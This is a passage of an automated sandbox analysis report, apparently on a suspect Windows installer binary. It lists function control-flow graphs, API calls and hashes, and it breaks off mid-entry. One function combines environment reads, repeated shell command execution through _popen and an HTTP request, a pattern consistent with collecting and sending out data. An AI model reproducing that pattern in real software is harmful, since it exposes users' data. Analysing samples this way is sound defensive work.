                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_cexit_inittermmemcpystrlen
                                        • String ID:
                                        • API String ID: 738594520-0
                                        • Opcode ID: 4dd5e5f985745f7e118c9626b52e5cbea5342cdb7049d461b6b66580b2f20d0a
                                        • Instruction ID: 3d4fbdc7d7a531b39a2c818e3d547337ecdca7df6cb770b93667e5f9bd008aac
                                        • Opcode Fuzzy Hash: 4dd5e5f985745f7e118c9626b52e5cbea5342cdb7049d461b6b66580b2f20d0a
                                        • Instruction Fuzzy Hash: 07411C709083418BDB10EF65D9C075ABBE0FB48324F10457EE948AB362D7789945CF5A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 636 401150-40117a 638 401430-401439 GetStartupInfoA 636->638 639 401180-401191 636->639 641 401441-40145a _initterm 638->641 640 4011a7-4011b3 639->640 642 401193-401195 640->642 643 4011b5-4011bf 640->643 648 401464 641->648 644 4013d0-4013dd 642->644 645 40119b-4011a4 Sleep 642->645 646 4013e3-4013f7 _amsg_exit 643->646 647 4011c5-4011cc 643->647 644->646 644->647 645->640 650 4011ea-4011ec 646->650 651 4013fd-40141d _initterm 646->651 647->641 649 4011d2-4011e4 647->649 654 40146c-401492 exit call 40ca60 648->654 649->650 649->651 652 4011f2-4011f9 650->652 653 401423-401429 650->653 651->652 651->653 655 401217-401257 call 40cef0 SetUnhandledExceptionFilter call 41bfc0 call 40cd70 __p__acmdln 652->655 656 4011fb-401214 652->656 653->652 666 401271-401277 655->666 667 401259 655->667 656->655 669 401260-401262 666->669 670 401279-401284 666->670 668 4012b4-4012bc 667->668 673 4012d2-4012f2 malloc 668->673 674 4012be-4012c7 668->674 671 401290-401292 669->671 672 401264-401267 669->672 675 40126e 670->675 679 401294 671->679 680 4012a5-4012ad 671->680 672->671 676 401269 672->676 673->648 681 4012f8-401309 673->681 677 4013c0-4013c4 674->677 678 4012cd 674->678 675->666 676->675 677->678 678->673 682 4012af 679->682 680->682 684 4012a0-4012a3 680->684 683 401310-401344 strlen malloc memcpy 681->683 682->668 683->683 685 401346-401398 call 40ca20 call 40165f 683->685 684->680 684->682 685->654 690 40139e-4013a6 685->690 691 4013b2-4013bd 690->691 692 4013a8-4013ad _cexit 690->692 692->691
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                                        • String ID:
                                        • API String ID: 1672962128-0
                                        • Opcode ID: cd126bc7a7c0183d7e4c726f9d3488adacf4119440ef7987faa819f9054f49bc
                                        • Instruction ID: 5a73557c9d0d0220e4833ada1b4f14b4f7ee444aa801d976e319a33373ffe0c5
                                        • Opcode Fuzzy Hash: cd126bc7a7c0183d7e4c726f9d3488adacf4119440ef7987faa819f9054f49bc
                                        • Instruction Fuzzy Hash: 85514C71A043408FDB11DF69D9C075ABBF0FB49328F10457EE948AB3A2D778A845CB99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 693 40fa29-40fa3e 694 499659 abort 693->694 695 40fa44-40fa4f 693->695 698 49965e-49967e abort * 5 694->698 696 40fa70-40fa75 695->696 697 40fa51-40fa57 695->697 696->697 701 40fa77-40fa81 696->701 697->694 699 40fa5d-40fa66 697->699 705 499680 698->705 699->696 705->705
                                        APIs
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: c3958b69a29253442853df63de800c7c9b5e3d3323e0584bd7214dddfe859f89
                                        • Instruction ID: 90822e3a823855a74ae1923b3367c552f02d7a1981c36e4a34a9c47522a55612
                                        • Opcode Fuzzy Hash: c3958b69a29253442853df63de800c7c9b5e3d3323e0584bd7214dddfe859f89
                                        • Instruction Fuzzy Hash: DFF06271A043414AD210EF5E94567BABBA0FB82314F84586EE64427293C73C9C88CADE

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 833 40fe40-40fe84 call 40f4a0 836 40fed2-40feda call 40f720 833->836 837 40fe86 call 40f650 833->837 841 40fe8b-40fe8e 836->841 843 49965e-49967e abort * 5 836->843 837->841 842 40fe94-40fed1 call 40f850 call 40fc30 841->842 841->843 852 499680 843->852 852->852
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_once
                                        • String ID:
                                        • API String ID: 3286866217-0
                                        • Opcode ID: d7c1e95de4ec08dfa10c667e1d8b8ea849ed7de8eabcd2a5f6fcc23cd1de2301
                                        • Instruction ID: 1d22a9e5e9d9321e174116b029eada938af3a821a58e412d884a90dfdfd0e460
                                        • Opcode Fuzzy Hash: d7c1e95de4ec08dfa10c667e1d8b8ea849ed7de8eabcd2a5f6fcc23cd1de2301
                                        • Instruction Fuzzy Hash: 4B114F32A0021C9BCF24EF95C8819EEB7B4EF85314F10847EAD0977341DB34AE498AD5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 40165f-401cf8 call 40ca20 FindWindowA getenv call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 494ec0 call 494de0 call 486620 * 2 call 458470 call 42a130 _popen Sleep call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 162 401d48-401db0 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 0->162 163 401cfa-401d43 call 494fb0 call 486680 call 486620 0->163 179 401e00-401e68 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 162->179 180 401db2-401dfb call 494fb0 call 486680 call 486620 162->180 163->162 196 401eb8-401f20 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 179->196 197 401e6a-401eb3 call 494fb0 call 486680 call 486620 179->197 180->179 213 401f70-401fd8 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 196->213 214 401f22-401f6b call 494fb0 call 486680 call 486620 196->214 197->196 230 402028-402090 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 213->230 231 401fda-402023 call 494fb0 call 486680 call 486620 213->231 214->213 247 4020e0-402148 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 230->247 248 402092-4020db call 494fb0 call 486680 call 486620 230->248 231->230 264 402198-402200 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 247->264 265 40214a-402193 call 494fb0 call 486680 call 486620 247->265 248->247 281 402250-4022b8 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 264->281 282 402202-40224b call 494fb0 call 486680 call 486620 264->282 265->264 298 402308-402370 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 281->298 299 4022ba-402303 call 494fb0 call 486680 call 486620 281->299 282->281 315 4023c0-402421 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 298->315 316 402372-4023bb call 494fb0 call 486680 call 486620 298->316 299->298 331 402426-402428 315->331 316->315 332 402478-40252b call 48ccc0 call 494ff8 call 494de0 call 494e14 call 486620 * 3 _ZN6curlpp7CleanupC1Ev 331->332 333 40242a-402473 call 494fb0 call 486680 call 486620 331->333 353 40252d-40254d call 41d634 _ZN6curlpp4Easy7performEv 332->353 354 40254f-40258c call 494fb0 call 41d634 call 486620 _ZN6curlpp4Easy7performEv 332->354 333->332 359 402591-402c62 _ZN6curlpp7CleanupD1Ev call 486620 * 24 353->359 354->359
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: _popen$CleanupEasy7performN6curlpp4N6curlpp7$FindSleepWindowgetenvstrlen
                                        • String ID: d!J$l"J
                                        • API String ID: 2089126685-1660994928
                                        • Opcode ID: 1f845ef25b6485fed4c4845b3a23ef83b2d64344ac0362beeb03cee787b1a368
                                        • Instruction ID: a1c288b360c48479ebdc30672b196576d81706e97189c13799ef98729f4e13f7
                                        • Opcode Fuzzy Hash: 1f845ef25b6485fed4c4845b3a23ef83b2d64344ac0362beeb03cee787b1a368
                                        • Instruction Fuzzy Hash: AB920A70A042198BCF54FF75C99559DB7F9AF84308F4088BE9889E7341FB389A888F55

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 478 64948030-64948099 call 64949480 call 649494c0 abort 484 64948280-64948282 478->484 485 6494809f-649480a5 478->485 486 649480a7-649480ac 485->486 487 649480bc-649480c4 486->487 488 649480ae-649480b6 486->488 487->486 490 649480c6-649480d2 call 64948ac0 487->490 488->487 489 64948190-6494819a 488->489 492 64948149-6494815f VirtualQuery 489->492 497 649482a7-649482b2 call 64948030 490->497 498 649480d8-6494812f call 64948b90 VirtualQuery 490->498 494 64948165-6494816c 492->494 495 649482b7-649482d7 call 64948030 492->495 499 649481a0-649481a3 494->499 500 6494816e-64948181 memcpy 494->500 510 649482e0-6494832f call 64948b00 call 649493f0 495->510 511 649482d9 495->511 497->495 512 64948135-6494813c 498->512 513 64948287-6494829e 498->513 499->500 501 649481a5-649481ee VirtualProtect memcpy 499->501 505 64948186-6494818d 500->505 501->505 506 649481f0-649481f3 501->506 506->505 509 649481f5-6494821c VirtualProtect 506->509 525 64948335-64948338 510->525 526 649483d1-649483d8 510->526 516 64948220-64948223 512->516 517 64948142 512->517 513->497 514 649482a2 call 64948030 513->514 514->497 516->517 518 64948229-6494825f VirtualProtect 516->518 517->492 518->517 520 64948265-6494827c GetLastError call 64948030 518->520 520->484 527 64948490 525->527 528 6494833e-64948345 525->528 531 64948495-64948499 527->531 529 649483d9 528->529 530 6494834b-64948352 528->530 533 649483de-649483e4 529->533 530->529 532 64948358-64948365 530->532 531->533 534 6494849f-649484a4 531->534 532->531 535 6494836b 532->535 533->526 538 649483e6-64948410 call 64948080 533->538 536 64948370-64948376 534->536 537 649484aa 534->537 535->536 539 64948567-64948589 call 64948030 536->539 540 6494837c-64948385 536->540 537->533 545 64948412-64948420 538->545 553 649485aa 539->553 554 6494858b-6494858e 539->554 540->526 543 64948387-649483a2 540->543 546 649484af-649484df call 64948080 543->546 547 649483a8-649483ab 543->547 549 64948432-6494843d 545->549 550 64948422 545->550 562 649484e4-649484ed 546->562 551 64948525-64948542 call 64948080 547->551 552 649483b1-649483b4 547->552 557 64948424-64948430 549->557 558 6494843f-6494845c VirtualQuery 549->558 550->526 551->562 559 649484f8-64948523 call 64948080 552->559 560 649483ba-649483cc call 64948030 552->560 561 64948590-649485a5 554->561 557->526 557->549 565 64948544-64948562 call 64948030 558->565 566 64948462-6494848b VirtualProtect 558->566 559->562 560->526 572 649485a7 561->572 562->543 568 649484f3 562->568 565->539 566->557 568->545 572->553
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: QueryVirtual$abortmemcpy
                                        • String ID: @
                                        • API String ID: 2310791685-2766056989
                                        • Opcode ID: 2b7ae2df33974dd628e5248e86a322eb566449117a4461b63372651e02c79e06
                                        • Instruction ID: cd0b61dda2b7f99161b0901d061b19306d01c471fd7a760bb0aa525755706968
                                        • Opcode Fuzzy Hash: 2b7ae2df33974dd628e5248e86a322eb566449117a4461b63372651e02c79e06
                                        • Instruction Fuzzy Hash: 7071D7B498D3019FD748EF28D584A5ABBE4FF99784F51891DE888D7310E330E854CB92

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Current$Thread$ProcessValue$CreateDuplicateEventHandlePriorityabortfprintf
                                        • String ID:
                                        • API String ID: 3031014995-0
                                        • Opcode ID: 2e29305413a5518f4786ab4109353ff4159da3f3b6ba7ff97fe943597510cba7
                                        • Instruction ID: f65fdf35157a8e0690699ea63534f5b7c5066402f19757c57a2f514cfb37a261
                                        • Opcode Fuzzy Hash: 2e29305413a5518f4786ab4109353ff4159da3f3b6ba7ff97fe943597510cba7
                                        • Instruction Fuzzy Hash: E041F2B09487118FEB20AFA9C64875ABFF4FB59314F104A1DE8A597340E775E5088FA2

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 706 41d2c0-41d2d7 pthread_mutex_lock 707 41d3ea-497b56 call 41f220 706->707 708 41d2dd-41d2e8 706->708 720 497b58 call 496d80 707->720 721 497b5d-497b6a call 40fe40 707->721 709 41d350-41d353 708->709 710 41d2ea-41d2f6 708->710 712 41d359-41d367 pthread_mutex_unlock 709->712 710->709 713 41d2f8-41d2fb 710->713 716 41d3c0-41d3e5 call 496bf0 call 4972e0 712->716 717 41d369-41d370 712->717 718 41d301-41d303 713->718 719 41d390-41d3a2 713->719 716->707 722 41d3a4-41d3ad 718->722 723 41d309-41d30b 718->723 719->712 720->721 741 497b6c call 496d80 721->741 742 497b71-497bb4 call 40fe40 pthread_mutex_init malloc 721->742 727 41d324-41d326 722->727 728 41d31a-41d322 723->728 729 41d30d-41d3bb 723->729 735 41d380-41d38c 727->735 736 41d328-41d332 727->736 728->727 734 41d312-41d316 728->734 729->727 734->727 740 41d318 734->740 735->736 737 41d371-41d377 736->737 738 41d334-41d347 736->738 737->712 738->712 740->728 741->742 746 497bd8-497bec 742->746 747 497bb6-497bc1 742->747 748 497bc8-497bd7 call 4014c0 746->748 747->748
                                        APIs
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 0041D2D0
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 0041D360
                                        • pthread_mutex_init.LIBWINPTHREAD-1 ref: 00497B92
                                        • malloc.MSVCRT ref: 00497BA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: mallocpthread_mutex_initpthread_mutex_lockpthread_mutex_unlock
                                        • String ID: lpJ
                                        • API String ID: 1674753379-129645102
                                        • Opcode ID: 20aa177bee8d51443119d847946777f32a96d19e2bef0a295f5a2dfdf495ba8c
                                        • Instruction ID: 26b813f0526bfceca514e7c9a0f061a522b97b39d855c3efe8bb90c56aa2f88c
                                        • Opcode Fuzzy Hash: 20aa177bee8d51443119d847946777f32a96d19e2bef0a295f5a2dfdf495ba8c
                                        • Instruction Fuzzy Hash: 45415BB1A042068FCB10EF25D48466EBBE0BF96348F15856FD8588B311E7789886CB5E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 751 41d400-41d416 pthread_mutex_lock 752 41d4cb-497b6a call 41f220 751->752 753 41d41c-41d438 751->753 767 497b6c call 496d80 752->767 768 497b71-497bb4 call 40fe40 pthread_mutex_init malloc 752->768 754 41d451 753->754 755 41d43a-41d43e 753->755 760 41d453-41d461 pthread_mutex_unlock 754->760 757 41d440-41d49f 755->757 758 41d44a-41d44f 755->758 766 41d473-41d47d 757->766 758->754 765 41d442-41d446 758->765 763 41d4a1-41d4c6 call 496bf0 call 4972e0 760->763 764 41d463-41d46b 760->764 763->752 770 41d470 765->770 771 41d448 765->771 772 41d492-41d496 766->772 773 41d47f-41d48b 766->773 767->768 780 497bd8-497bec 768->780 781 497bb6-497bc1 768->781 770->766 771->758 777 41d48d-41d490 772->777 773->777 777->760 782 497bc8-497bd7 call 4014c0 780->782 781->782
                                        APIs
                                        • pthread_mutex_lock.LIBWINPTHREAD-1(?,?,?,00496C39,?,?,?,?,?,004920D4,?,?,?,00485CB8), ref: 0041D40F
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1(?,?,?,00496C39,?,?,?,?,?,004920D4,?,?,?,00485CB8), ref: 0041D45A
                                          • Part of subcall function 00496BF0: malloc.MSVCRT ref: 00496BFE
                                        • pthread_mutex_init.LIBWINPTHREAD-1 ref: 00497B92
                                        • malloc.MSVCRT ref: 00497BA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc$pthread_mutex_initpthread_mutex_lockpthread_mutex_unlock
                                        • String ID: lpJ
                                        • API String ID: 661434298-129645102
                                        • Opcode ID: c3dba70a0ea669742c4d5cd8d5b3471d3b5df1c87b6ad7bcb0a79c6616cc1072
                                        • Instruction ID: 2cab2a2604251acd9e1c26d9c5fd11c1da8bb51725402f01afc28a56640a7ecb
                                        • Opcode Fuzzy Hash: c3dba70a0ea669742c4d5cd8d5b3471d3b5df1c87b6ad7bcb0a79c6616cc1072
                                        • Instruction Fuzzy Hash: DB31B0F1A48301CFD700AF69D48436ABFE0BB46348F5585BED5888B351E37C98858B5E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 785 401299 786 4012a0-4012a3 785->786 787 4012a5-4012ad 786->787 788 4012af-4012bc 786->788 787->786 787->788 790 4012d2-4012f2 malloc 788->790 791 4012be-4012c7 788->791 794 401464 790->794 795 4012f8-401309 790->795 792 4013c0-4013c4 791->792 793 4012cd 791->793 792->793 793->790 797 40146c-401492 exit call 40ca60 794->797 796 401310-401344 strlen malloc memcpy 795->796 796->796 798 401346-401398 call 40ca20 call 40165f 796->798 798->797 805 40139e-4013a6 798->805 806 4013b2-4013bd 805->806 807 4013a8-4013ad _cexit 805->807 807->806
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc$_cexitmemcpystrlen
                                        • String ID:
                                        • API String ID: 701060287-0
                                        • Opcode ID: 06c8ec97fb9d0d8078208a5fed52b2eb6e75a7703e5f9957ea4541548415c957
                                        • Instruction ID: 6ff02f7f8e87337fbd71bedcca9d93ca2c1ed4cb2c18e8dc790010e9ad0b078e
                                        • Opcode Fuzzy Hash: 06c8ec97fb9d0d8078208a5fed52b2eb6e75a7703e5f9957ea4541548415c957
                                        • Instruction Fuzzy Hash: D3314A75A043458FDB10DF65D8C0689BBE1FB48324F14497EE948AB362D338A945CF89

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 808 401289-401292 810 401294 808->810 811 4012a5-4012ad 808->811 812 4012af-4012bc 810->812 811->812 813 4012a0-4012a3 811->813 815 4012d2-4012f2 malloc 812->815 816 4012be-4012c7 812->816 813->811 813->812 819 401464 815->819 820 4012f8-401309 815->820 817 4013c0-4013c4 816->817 818 4012cd 816->818 817->818 818->815 822 40146c-401492 exit call 40ca60 819->822 821 401310-401344 strlen malloc memcpy 820->821 821->821 823 401346-401398 call 40ca20 call 40165f 821->823 823->822 830 40139e-4013a6 823->830 831 4013b2-4013bd 830->831 832 4013a8-4013ad _cexit 830->832 832->831
                                        APIs
                                        Memory Dump Source
